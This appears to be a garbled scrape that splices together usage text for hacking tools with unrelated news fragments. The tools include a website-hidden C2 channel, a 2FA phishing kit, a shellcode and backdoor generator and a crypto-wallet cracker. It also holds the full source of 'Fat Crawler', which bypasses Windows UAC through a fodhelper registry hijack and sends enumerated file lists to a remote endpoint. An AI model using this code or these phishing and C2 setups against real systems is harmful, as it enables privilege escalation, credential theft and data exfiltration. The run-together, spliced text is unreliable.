git clone https://github.com/UndeadSec/EvilURL.gitcd EvilURL
python evilurl.py
Options
-d, --dir-input directory Directory with common crawl index files with .gz extension. Ex: -d "/tmp/cc/"
-v, --ia-dir-input directory Directory with internet archive index files with .gz extension. Ex: -v "/tmp/ia/"
-o, --output-file file Save test results to file. Ex: -o /tmp/results.csv
-u, --update-db Build/Update Paskto DB from Nikto databases.
-n, --use-nikto Use Nikto DBs. Default: true
-e, --use-extras Use EXTRAS DB. Default: true
-s, --scan domain name Domain to scan. Ex: -s "www.google.ca" or -s "*.google.ca"
-i, --cc-index index Common Crawl index for scan. Ex: -i "CC-MAIN-2017-34-index"
-a, --save-all-urls file Save CSV List of all URLS. Ex: -a /tmp/all_urls.csv
-h, --help Print this usage guide.
Examples
Scan domain, save results and URLs $ node paskto.js -s "www.msn.com" -o /tmp/rest-results.csv -a /tmp/all-urls.csv
Scan domain with CC wildcards. $ node paskto.js -s "*.msn.com" -o /tmp/rest-results.csv -a /tmp/all-urls.csv
Scan domain, only save URLs. $ node paskto.js -s "www.msn.com" -o /tmp/rest-results.csv
Scan dir with indexes. $ node paskto.js -d "/tmp/CC-MAIN-2017-39-index/" -o /tmp/rest-results.csv -a /tmp/all-urls.csv
$ docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion
[tor_wait] Wait for Tor to boot... (might take a while)
[tor_wait] Done. Tor booted.
[nmap onion] nmap -p 80,443 facebookcorewwwi.onion
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.12
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:17 UTC
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:443 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:80 ... OK
Nmap scan report for facebookcorewwwi.onion (224.0.0.1)
Host is up (2.7s latency).
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 3.58 secondstor_wait script then waits for the Tor SOCKS proxy to be up before executing your command.docker run are passed to /bin/nmap which calls nmap with args -sT -PN -n "$@" necessary for it to work over Tor (via explainshell.com).docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onionproxychains4 -f /etc/proxychains.conf /usr/bin/nmap -sT -PN -n -p 80,443 facebookcorewwwi.onionnmap, custom wrapper scripts for curl and nc exist to wrap them in proxychains, at /bin/curl and /bin/nc. To call them, simply specify curl or nc as the first argument to docker run. For example:docker run --rm -it milesrichardson/onion-nmap nc -z 80 facebookcorewwwi.onionproxychains4 -f /etc/proxychains.conf /usr/bin/nc -z 80 facebookcorewwwi.oniondocker run --rm -it milesrichardson/onion-nmap curl -I https://facebookcorewwwi.onionproxychains4 -f /etc/proxychains.conf /usr/bin/curl -I https://facebookcorewwwi.onion/usr/bin/nmap or /usr/bin/nc or /usr/bin/curl you can specify it as the first argument to docker run, e.g.:docker run --rm -it milesrichardson/onion-nmap /usr/bin/curl -x socks4h://localhost:9050 https://facebookcorewwwi.onionDEBUG_LEVEL. If you set it to anything other than 0, more debugging info will be printed (specifically, the attempted to connections to Tor while waiting for it to boot). Example:$ docker run -e DEBUG_LEVEL=1 --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion
[tor_wait] Wait for Tor to boot... (might take a while)
[tor_wait retry 0] Check socket is open on localhost:9050...
[tor_wait retry 0] Socket OPEN on localhost:9050
[tor_wait retry 0] Check SOCKS proxy is up on localhost:9050 (timeout 2 )...
[tor_wait retry 0] SOCKS proxy DOWN on localhost:9050, try again...
[tor_wait retry 1] Check socket is open on localhost:9050...
[tor_wait retry 1] Socket OPEN on localhost:9050
[tor_wait retry 1] Check SOCKS proxy is up on localhost:9050 (timeout 4 )...
[tor_wait retry 1] SOCKS proxy DOWN on localhost:9050, try again...
[tor_wait retry 2] Check socket is open on localhost:9050...
[tor_wait retry 2] Socket OPEN on localhost:9050
[tor_wait retry 2] Check SOCKS proxy is up on localhost:9050 (timeout 6 )...
[tor_wait retry 2] SOCKS proxy UP on localhost:9050
[tor_wait] Done. Tor booted.
[nmap onion] nmap -p 80,443 facebookcorewwwi.onion
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.12
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:34 UTC
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:443 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:80 ... OK
Nmap scan report for facebookcorewwwi.onion (224.0.0.1)
Host is up (2.8s latency).
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 4.05 seconds
1. trevor2_server.py - edit the file first, and customize, what website you want to clone, etc. The server will clone a website of your choosing and stand up a server. This server is browsable by anyone and looks like a legitimate website. Contained within the source is parameter that (again is configurable), which contains the instructions for the client. Once a client connects, it searches for that parameter, then uses it to execute commands.
2. trevor2_client.py - all you need in any configurable option is the ability to call out to a website, parse some basic data, and then execute a command and then put the results in a base64 encoded query string parameter to the site. That's it, not hard. pip install -r requirements.txtpython trevor2_server.pypython trevor2_client.py
optional arguments:
-h, --help show this help message and exit
--module MODULE phishing module name - for example, "gmail"
--twofactor enable two-factor phishing
--port PORT listening port (default: 80/443)
--ssl use SSL via Let's Encrypt
--verbose enable verbose output
--final FINAL final url the user is redirected to after phishing is done
--hostname HOSTNAME hostname for SSLhttps://<phish site>/creds/view?api_token=<api token>https://<phish site>/creds/seen/<cred_id>?api_token=<api token>https://<phish site>/config {
'enable_2fa': true,
'module': 'gmail',
'api_token': 'some-random-string'
}--module <name> command to CredSniper. These are loaded from a directory inside /modules. CredSniper is built using Python Flask and all the module HTML templates are rendered using Jinja2.$ git clone https://github.com/ustayready/CredSniper
$ cd CredSniper
~/CredSniper$ ./install.sh~/$ cd CredSniper
~/CredSniper$ source bin/activate
(CredSniper) ~/CredSniper$ python credsniper.py --help"Using Hive even if an implant is discovered on a target computer, attributing it to the CIA is difficult by just looking at the communication of the malware with other servers on the internet," WikiLeaks says.As shown in the diagram, the malware implants directly communicate with a fake website, running over commercial VPS (Virtual Private Server), which looks innocent when opened directly into the web browser.
"Digital certificates for the authentication of implants are generated by the CIA impersonating existing entities," WikiLeaks says.
"The three examples included in the source code build a fake certificate for the anti-virus company Kaspersky Laboratory, Moscow pretending to be signed by Thawte Premium Server CA, Cape Town."The whistleblowing organisation has released the source code for Project Hive which is now available for anyone, including investigative journalists and forensic experts, to download and dig into its functionalities.
"Apple engineering teams have even gone and worked with professional mask makers and makeup artists in Hollywood to protect against these attempts to beat Face ID," Apple's senior VP of worldwide marketing Phil Schiller said about Face ID system during the event."These are actual masks used by the engineering team to train the neural network to protect against them in Face ID."
"We used a popular 3D printer. The nose was made by a handmade artist. We use 2D printing for other parts (similar to how we tricked Face Recognition 9 years ago). The skin was also hand-made to trick Apple's AI," the firm said.
git clone https://github.com/UltimateHackers/Blazycd Blazypip install -r requirements.txtpython blazy.py
python fatcrawler.py --dir C:\ --file-type *.txt --endpoint http://localhost --force-uac --verbose
#!/usr/bin/env python
# -*- coding: utf-8; mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vim: fileencoding=utf-8 tabstop=4 expandtab shiftwidth=4
"""
The Fat Crawler.
This is a simple file crawler that performs a recursive lookup on the given folder and file type.
The current supported arguments to run this crawler are:
-d --dir The start directory path
-t --file-type The file type to lookup
-c --chunck The chunck size to report to the server
-e --endpoint The endpoint to report the enumerated files
-f --force-uac Forces an UAC bypass
-v --verbose Enables the verbose mode
Note: The script will try to bypass the UAC if the the operational system is a "NT family"
and the user has no administrative privileges.
This script was tested on Windows 10, Ubuntu Server 16.10 and Kali Linux only
"""
import argparse
import os
import sys
import fnmatch
import threading
import ctypes
import urllib, urllib2
import logging as log
import subprocess
try:
import _winreg
except:
pass
parser = argparse.ArgumentParser(prog='fatcrawler', description='The Fat Crawler')
parser.add_argument('-d', '--dir', metavar = '', required=True, help = 'The start directory')
parser.add_argument('-t', '--file-type', metavar = '', required=True, help = 'The file type')
parser.add_argument('-c', '--chunck', metavar ='', default=10, help = 'The chunck size to report to the server')
parser.add_argument('-e', '--endpoint', metavar = '', required=True, help = 'The endpoint url to send the enumerated files')
parser.add_argument('-f', '--force-uac', action='store_true', help='Force UAC bypass')
parser.add_argument('-v', '--verbose', action='store_true', help='Enables the verbose mode')
banner = '''
|\_,,____
( o__o \/
/(..) \\ Fat Crawler
(_ )--( _) It'll swallow everything
/ ""--"" \\
,===,=| |-,,,,-| |==,==
| | WW | WW |
| | | | | |
[k1dd0] - v1
'''
# Windows constants
REG_PATH = "Software\Classes\ms-settings\shell\open\command"
CMD = r"C:\Windows\\system32\cmd.exe"
FOD_HELPER = r"C:\\Windows\\system32\\fodhelper.exe"
PYTHON_EXE = r"C:\Python27\python.exe"
DEFAULT_REG_KEY = '(default)'
DELEGATE_EXEC_REG_KEY = 'DelegateExecute'
def is_running_as_admin():
'''
Checks if the script is running with administrator privileges.
Returns True if is running as admin, False otherwise.
'''
if os.name == 'nt':
try:
return ctypes.windll.shell32.IsUserAnAdmin()
except:
return False
else:
return os.getuid() == 0
def create_reg_key(key, value):
'''
Tries to create a reg key
'''
try:
_winreg.CreateKey(_winreg.HKEY_CURRENT_USER, REG_PATH)
registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, REG_PATH, 0, _winreg.KEY_WRITE)
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
_winreg.CloseKey(registry_key)
except WindowsError:
raise
def bypass_uac(runner):
'''
Tries to bypass the UAC
'''
try:
create_reg_key(DELEGATE_EXEC_REG_KEY, '')
create_reg_key(DEFAULT_REG_KEY, runner)
except WindowsError:
log.info('[!] FATAL: could not bypass the UAC')
raise
def report_data(endpoint, files):
'''
Performs a POST request on the given endpoint
'''
data = urllib.urlencode({'files': files})
req = urllib2.Request(endpoint, data)
urllib2.urlopen(req)
def execute(args):
'''
Executes the fat crawler
'''
if args.verbose:
log.basicConfig(format='%(message)s', level = log.DEBUG)
log.info(banner)
log.info('[+] Checking for privileged access...')
if not is_running_as_admin():
log.info('[+] The script is not running with administrative privileges')
log.info('[+] Checking the operational system...')
log.info('[+] OS: {}'.format(os.name))
if os.name == 'nt' and args.force_uac:
log.info('[+] Trying to bypass the UAC')
try:
current_dir = os.path.dirname(os.path.realpath(__file__)) + r'\fatcrawler.py'
runner = PYTHON_EXE + '' + current_dir + '' + ''.join(sys.argv[1:])
bypass_uac(runner)
subprocess.Popen(subprocess)
subprocess.Popen(FOD_HELPER)
sys.exit(0)
except WindowsError:
log.info('[!] Could not operate in UAC bypass force mode')
sys.exit(1)
else:
log.info('[+] Nothing to do, skiping UAC bypass')
else:
log.info('[+] The script is running with administrative privileges!')
files = []
for root, dirnames, filenames in os.walk(args.dir):
for filename in fnmatch.filter(filenames, args.file_type):
file_path = os.path.join(root, filename)
files.append(file_path)
log.info('[+] File found: {}'.format(file_path))
if len(files) == args.chunck:
files_copy = list(files)
thread = threading.Thread(target=report_data, args=(args.endpoint, files_copy))
thread.start()
files = []
# check if there is any file left
if (len(files) > 0):
log.info('[+] Preparing to shutdown, flushing the file list...')
files_copy = list(files)
thread = threading.Thread(target=report_data, args=(args.endpoint, files_copy))
thread.start()
files = []
log.info('[+] Shutting down the fat crawler')
log.info('[+] Bye')
sys.exit(0)
if __name__ == '__main__':
try:
args = parser.parse_args()
execute(args)
except KeyboardInterrupt:
sys.exit(0)
usage: cmspoc.py [-h]
-t TYPE -s SCRIPT -u URL
optional arguments:
-h, --help show this help message and exit
-t TYPE, --type TYPE e.g.,phpcms
-s SCRIPT, --script SCRIPT
Select script
-u URL, --url URL Input a target url
USAGE:
hashrat [options] [paths]...
Hash things: hashrat [options] [paths to hash]
Check hashes: hashrat -c [options] [paths to hash]
Find files matching: hashrat -m [options] [paths to hash]
Find duplicate files: hashrat -dups [options] [paths to hash]
Options:
--help Print this help
-help Print this help
-? Print this help
--version Print program version
-version Print program version
-type Use hash algorithmn . Types can be chained together as a comma-seperated list.
-md5 Use md5 hash algorithmn
-sha1 Use sha1 hash algorithmn
-sha256 Use sha256 hash algorithmn
-sha512 Use sha512 hash algorithmn
-whirl Use whirlpool hash algorithmn
-whirlpool Use whirlpool hash algorithmn
-jh224 Use jh-224 hash algorithmn
-jh256 Use jh-256 hash algorithmn
-jh384 Use jh-384 hash algorithmn
-jh512 Use jh-512 hash algorithmn
-hmac HMAC using specified hash algorithm
-8 Encode with octal instead of hex
-10 Encode with decimal instead of hex
-H Encode with UPPERCASE hexadecimal
-HEX Encode with UPPERCASE hexadecimal
-64 Encode with base64 instead of hex
-base64 Encode with base64 instead of hex
-i64 Encode with base64 with rearranged characters
-p64 Encode with base64 with a-z,A-Z and _-, for best compatibility with 'allowed characters' in websites.
-x64 Encode with XXencode style base64.
-u64 Encode with UUencode style base64.
-g64 Encode with GEDCOM style base64.
-a85 Encode with ASCII85.
-z85 Encode with ZEROMQ variant of ASCII85.
-t Output hashes in traditional md5sum, shaXsum format
-trad Output hashes in traditional md5sum, shaXsum format
-bsd Output hashes in bsdsum format
-tag Output hashes in bsdsum format
--tag Output hashes in bsdsum format
-r Recurse into directories when hashing files
-f Hash files listed in
-i Only hash items matching
-x Exclude items matching
-n Truncate hashes to bytes
-c CHECK hashes against list from file (or stdin)
-cf CHECK hashes but only show failures
-C CHECK files against list from file (or stdin) can spot new files
-Cf CHECK files but only show failures
-m MATCH files from a list read from stdin.
-lm Read hashes from stdin, upload them to a memcached server (requires the -memcached option).
-X In CHECK or MATCH mode only examine executable files.
-exec In CHECK or MATCH mode only examine executable files.
-dups Search for duplicate files.
-memcached Specify memcached server. (Overrides reading list from stdin if used with -m, -c or -cf).
-mcd Specify memcached server. (Overrides reading list from stdin if used with -m, -c or -cf).
-h hookscripts are passed the path of the appropriate file as an argument. In ‘find duplicates’ mode a second argument is passed, which is the duplicate file. Hashrat can also detect if it's being run under any of the following names (e.g., via symlinks) md5sum run with '-trad -md5'
shasum run with '-trad -sha1'
sha1sum run with '-trad -sha1'
sha256sum run with '-trad -sha256'
sha512sum run with '-trad -sha512'
jh224sum run with '-trad -jh224'
jh256sum run with '-trad -jh256'
jh384sum run with '-trad -jh384'
jh512sum run with '-trad -jh512'
whirlpoolsum run with '-trad -whirl'
hashrat.cgi run in web-enabled 'cgi mode' “THE FIRST HUMAN TRANSPLANT ON HUMAN CADAVERS HAS BEEN DONE.”
“AND THAT IS THE FINAL STEP FOR THE FORMAL HEAD TRANSPLANT FOR A MEDICAL CONDITION WHICH IS IMMINENT.”
root$ sudo pip install capstone
root$ sudo pip install readline
root$ python setup.py -s/–setup install
root$ shellsploit
root$ python setup.py -s/–setup uninstall
usage: shellsploit [-l] [-p] [-o] [-n]
[--host] [--port]
optional arguments:
-l, --list Show list of backdoors,shellcodes,injectors
-p, --payload Set payload for usage
-n, -nc Declare netcat for usage
--host The connect/listen address
--port The connect/listen port
Inline arguments:
Main Menu:
help Help menu
os Command directly ur computer
use Select Module For Use
clear Clear the menu
show modules Show Modules of Current Database
show backdoors Show Backdoors of Current Database
show injectors Show Injectors(Shellcode,dll,so etc..)
Shellcode Menu:
back Exit Current Module
set Set Value Of Options To Modules
ip Get IP address(Requires net connection)
os Command directly ur computer
clear Clear the menu
disas Disassembly the shellcode(Support : x86/x64)
whatisthis Learn which kind of shellcode it is
iteration Encoder iteration time
generate Generate shellcode
output Save option to shellcode(txt,py,c,cpp,exe)
show encoders List all obfucscation encoders
show options Show Current Options Of Selected Module
Injector Menu:
set Set Value Of Options To Modules
help Help menu
back Exit Current Module
os Command directly ur computer
pids Get PID list of computer
getpid Get specific PID on list(Ex. getpid Python)
python generuj.py -s "fist,second,third"python generuj.py -v input.txtpython generuj.py -min 8 -s "1,2,3,4,5,6,7,8,9,0"python generuj.py -max 4 -s "1,2,3,4,5,6,7,8,9,0"python louskac.py -p UTC--2017-07-12T00-06-42.772050600Z--f5751c906091b98be2a6be5ce42c573d704aedab -b 1234567890 -d 2python louskac.py -p UTC--2017-07-12T00-06-42.772050600Z--f5751c906091b98be2a6be5ce42c573d704aedab -b @#! -d 3python louskac.py -p UTC--2017-07-12T00-06-42.772050600Z--f5751c906091b98be2a6be5ce42c573d704aedab -b ASCII -d 4python louskac.py -p UTC--2017-07-12T00-06-42.772050600Z--f5751c906091b98be2a6be5ce42c573d704aedab -b 1234567890 -d 2 -z start.txtpython louskac.py -p UTC--2017-07-12T00-06-42.772050600Z--f5751c906091b98be2a6be5ce42c573d704aedab -b 1234567890 -d 2 -k end.txtpython louskac.py -p UTC--2017-07-12T00-06-42.772050600Z--f5751c906091b98be2a6be5ce42c573d704aedab -w wordlist_01.txtpython louskac.py -p UTC--2017-07-12T00-06-42.772050600Z--f5751c906091b98be2a6be5ce42c573d704aedab -z start.txt -w wordlist_01.txtpython louskac.py -p UTC--2017-07-12T00-06-42.772050600Z--f5751c906091b98be2a6be5ce42c573d704aedab -w wordlist.txt -k end.txt"The reason we deleted those files and will delete similar ones in the future is two-fold; we do not need anything other than malware binaries to improve protection of our customers and secondly, because of concerns regarding the handling of potential classified materials," Kaspersky Lab report reads.
"Assuming that the markings were real, such information cannot and will not [be] consumed even to produce detection signatures based on descriptions."
"Given that system owner's potential clearance level, the user could have been a prime target of nation states," the Kaspersky report reads.
"Adding the user's apparent need for cracked versions of Windows and Office, poor security practices, and improper handling of what appeared to be classified materials, it is possible that the user could have leaked information to many hands."More details on the backdoor can be found here.
fatcat this way:mkdir build
cd build
cmake ..
makemake installfatcat disk.img [options]-O, this could be useful if there is multiple partitions on a block devices, for instance:fatcat disk.img -O 1048576 [options]-l option like this:$ fatcat disk.img -l /
Listing path /
Cluster: 2
d 24/10/2013 12:06:00 some_directory/ c=4661
d 24/10/2013 12:06:02 other_directory/ c=4662
f 24/10/2013 12:06:40 picture.jpg c=4672 s=532480 (520K)
f 24/10/2013 12:06:06 hello.txt c=4671 s=13 (13B)-l /some/directory.-L, you can provide a cluster number instead of a path, this may be useful sometime.-d, you will also see deleted files.f or d to tell if the line concerns a file or a directory.c= indicates the cluster number, s= indicates the site in bytes (which should be the same as the pretty size just after).h letter at the end indicates that the file is supposed to be hidden.d letter at the end indicates that the file was deleted.-r, the file will be wrote on the standard output:$ fatcat disk.img -r /hello.txt
Hello world!
$ fatcat disk.img -r /picture.jpg > save.jpg-R, you can provide a cluster number instead of a path, but the file size information will be lost and the file will be rounded to the number of clusters it fits, unless you provide the -s option to specify the file size to read.-x to extract the FAT filesystem directories to a directory:fatcat disk.img -x output/-c.-d to extract, deleted files will be extracted too.-d:$ fatcat disk.img -l / -d
f 24/10/2013 12:13:24 delete_me.txt c=5764 s=16 (16B) d-r to read it. Note that the produced file will be read contiguously from the original FAT system and may be broken.# If your deleted directory cluster is 71829
fatcat disk.img -x output/ -c 71829ddrescue, and save your disk to another one or into a sane file.0s in the ddrescue image.-l as above and check -i to find out if fatcat recognizes the disk as a FAT system.-2, to check if the file allocation tables differs, and if it looks mergeable. It is very likely that is will be mergeable, in this case, you can try -m to merge the FAT tables, don't forget to backup it before (see below).fatcat provides you an option to find those nodes, it will do an automated analysis of your system and explore allocated sectors of your filesystem, this is done with -o.There is 2 orphaned elements:
Directory clusters 4592 to 4592: 2 elements, 49B
File clusters 4611 to 4611: ~512B-L and -R to have a look into those files and directories:$ fatcat disk.img -L 4592
Listing cluster 4592
Cluster: 4592
d 23/10/2013 17:45:06 ./ c=4592
d 23/10/2013 17:45:06 ../ c=0
f 23/10/2013 17:45:22 poor_orphan.txt c=4601 s=49 (49B)fatcat to hack your FAT filesystem-i flag will provide you a lot of information about the filesystem:fatcat disk.img -i-@:fatcat disk.img -@ 1384-b to backup your FAT tables:fatcat disk.img -b backup.fats-p to write it back:fatcat disk.img -p backup.fats-w and -v:fatcat disk.img -w 123 -v 124124 as value of the next cluster of 123.-t, 0 is both tables, 1 is the first and 2 the second.-2:# Watching the diff
$ fatcat disk.img -2
Comparing the FATs
FATs are exactly equals
# Writing 123 in the 500th cluster only in FAT1
$ fatcat disk.img -w 500 -v 123 -t 1
Writing next cluster of 500 from 0 to 123
Writing on FAT1
# Watching the diff
$ fatcat disk.img -2
Comparing the FATs
[000001f4] 1:0000007b 2:00000000
FATs differs
It seems mergeable-m. For each different entries in the table, if one is zero and not the other, the non-zero file will be choosen:$ fatcat disk.img -m
Begining the merge...
Merging cluster 500
Merge complete, 1 clusters merged-f. All the filesystem tree will be walked and the directories that are unallocated in the FAT but that fatcat can read will be fixed in the FAT.-e:fatcat disk.img -e /hello.txt-c [cluster] to change the cluster of the entry and the flag -s [size] to change the entry size.-k to search for a cluster reference.-z, or using random data using -S.
usage: Cr3d0v3r.py [-h] email
positional arguments:
email Email/username to check
optional arguments:
-h, --help show this help message and exit
cd Cr3dOv3r-master
python -m pip install -r win_requirements.txt
python Cr3dOv3r.py -hgit clone https://github.com/D4Vinci/Cr3dOv3r.git
chmod 777 -R Cr3dOv3r-master
cd Cr3dOv3r-master
pip3 install -r requirements.txt
python Cr3dOv3r.py -h